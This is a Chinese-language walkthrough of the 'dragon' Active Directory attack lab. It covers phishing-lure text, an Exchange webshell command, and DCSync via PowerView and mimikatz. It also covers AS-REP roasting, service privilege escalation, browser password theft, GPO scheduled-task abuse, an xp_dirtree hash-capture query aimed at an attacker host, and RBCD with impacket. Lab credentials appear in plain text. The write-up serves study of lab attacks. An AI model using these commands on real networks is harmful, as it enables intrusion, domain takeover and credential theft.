dragon 靶场WP

靶场

靶场搭建:

https://github.com/0range-x/dragon-lab

ws01-owa钓鱼

扫描结果

image-20220610145158181

ftp匿名上传

image-20220610150402228

制作用户名字典

image-20220610145441403

构造字典msf爆破成功,字典用的rockyou.txt

成功登录

1
gaohexie/sweetpea#1

image-20220530201823355

image-20220530204556396

构造话术

1
2
3
关于自测钓鱼后门的通知

您好,近期公司组织攻防演练,发现攻击方使用钓鱼邮件进行攻击,已有多名同事中招,请下载后门检测工具,扫描机器是否被横向攻击。另外,希望同时提高安全意识,谨防被钓鱼攻击

image-20220610171548716

image-20220610172746519

ws02-exchange rce

cve-2021-26857

image-20220531011647320

成功写入shell

image-20220610175250310

1
command=Response.Write(new%20ActiveXObject("Wscript.Shell").exec("whoami").Stdout.ReadAll());

image-20220610175807860

python 开启web服务 下载木马上线

image-20220610180300395

image-20220610180350796

成功上线system

image-20220610181305844

定位域控

image-20220610181557699

image-20220610181619682

1
2
3
Add-DomainObjectAcl -TargetIdentity "DC=haishitest,DC=lab" -PrincipalIdentity gaohexie -Rights DCSync

mimi.exe "lsadump::dcsync /domain:haishitest.lab /user:administrator /csv" exit

导入powerview

image-20220610185611737

添加普通用户dcsync权限

image-20220610185706320

winrm登录

image-20220610191808759

执行上线

image-20220610191749387

抓到liaide的密码,该用户拥有dcsync权限,直接dcsync

ws04- as_rep

image-20220611111126318

发现maluzi用户存在as_rep

制作行为习惯字典

https://github.com/bigb0sss/goPassGen

生成字典

image-20220611112033126

爆破成功

image-20220611112307187

成功登录ws04机器

image-20220611112607475

发现xmanager目录

image-20220611112645500

上传解密工具

抓到密码

image-20220611113043484

ws05-空路径提权+dpapi解密

winrm登录服务器

image-20220611115111856

先上线cs

image-20220611115911283

3389远程连接

image-20220611162919473

查找可以服务提权的路径

image-20220611164849727

查看该服务

image-20220611164936672

停止该服务

image-20220611165039353

修改配置文件并启动上线

image-20220611165607649

image-20220611165552896

1
C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service

提权成功

image-20220611165647665

cs不稳定 反弹到nc

image-20220611170952128

上传解密工具

谷歌浏览器解密工具

https://github.com/moonD4rk/HackBrowserData/releases/tag/v0.4.3

image-20220611171432318

image-20220611171422055

注入到administrator进程

image-20220611171716537

抓取成功

image-20220611171925433

读取密码

image-20220611172041142

1
zhaolinlu:tEKO4f4CQ1BPPz~LQm

ws06-08-GPO批量上线

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
C:\Users\zhaolinlu\Desktop>StandIn_v13_Net45.exe --gpo --filter work --acl

[?] Using DC : ws13.haishi.lab
[+] GPO result count         : 1
    |_ Result limit          : 50
    |_ Applying search filter

[?] Object   : CN={07D9CE42-10BD-436D-89AA-3B2EFAF47766}
    Path     : LDAP://CN={07D9CE42-10BD-436D-89AA-3B2EFAF47766},CN=Policies,CN=System,DC=haishi,DC=lab
    GPCFilesysPath : \\haishi.lab\SysVol\haishi.lab\Policies\{07D9CE42-10BD-436D-89AA-3B2EFAF47766}
    Path           : OK

[+] Account       : CREATOR OWNER
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : InheritOnly

[+] Account       : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
    Type          : Allow
    Rights        : ReadAndExecute, Synchronize
    Inherited ACE : False
    Propagation   : None

[+] Account       : NT AUTHORITY\Authenticated Users
    Type          : Allow
    Rights        : ReadAndExecute, Synchronize
    Inherited ACE : False
    Propagation   : None

[+] Account       : NT AUTHORITY\SYSTEM
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

[+] Account       : HAISHI\Domain Admins
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

[+] Account       : HAISHI\Enterprise Admins
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

[+] Account       : HAISHI\zhaolinlu
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

image-20220603180211010

建立计划任务

1
StandIn_v13_Net45.exe --gpo  --filter work --tasktype computer --taskname task01 --author "haishi\Administrator" --command "powershell.exe /c" --args "net localgroup 'administrators' zhaolinlu /add"

https://github.com/rootSySdk/PowerGPOAbuse

1
Add-GPOGroupMember -Member 'zhaolinlu' -GPOIdentity 'work'

image-20220603173932739

同样的方式在ws08机器上发现mssql的sa账号密码

image-20220611174633555

sql01-xp_cmd 监听hash

登录成功

image-20220612001442223

执行xp_dirtree,监听得到hash

1
EXEC master.sys.xp_dirtree '\\192.168.200.15\simblog.txt',0,1;

image-20220612003930132

image-20220612003957326

拿到mssql服务账户的hash

image-20220612004012595

使用大字典rockyou.txt爆破出密码

image-20220612004949511

1
wuxinqi:xxotisxx14.

sql02-tv接管

3389成功登录该机器

image-20220612182423302

发现该机器有tv,同时连接着 192.168.201.100这台机器

image-20220612182449360

而且桌面保存着密码

image-20220612183954238

连接成功

image-20220612184021543

ws09- clm限制

发现cmd被禁用

image-20220612184847067

发现很多命令被禁用

image-20220612184921608

同时powershell被设置为 clm 语言模式

image-20220612185723118

同时发现该目录无法执行exe

切换一个白目录

bypass clm

https://hackmd.io/@0xbc000/B1pNFIuP_

限制目录执行exe

发现rbcd的用户

image-20220613131615068

image-20220613132059427

1
husungeng:X9NNkYTMp9jA2vKHXXI

ws12-rbcd接管exchange

生成机器账号

1
SharpAllowedToAct.exe -m husungeng -p X9NNkYTMp9jA2vKHXXI -t ws12 -a 192.168.200.2 haishi.lab

获取服务票据

1
python getST.py -dc-ip 192.168.200.2 haishi/husungeng:X9NNkYTMp9jA2vKHXXI -spn cifs/ws12.haishi.lab -impersonate administrator

导入票据

1
export KRB5CCNAME=administrator.ccache

getshell

1
python3 smbexec.py -no-pass -k ws12.haishi.lab

image-20220613170723911

ws13-dc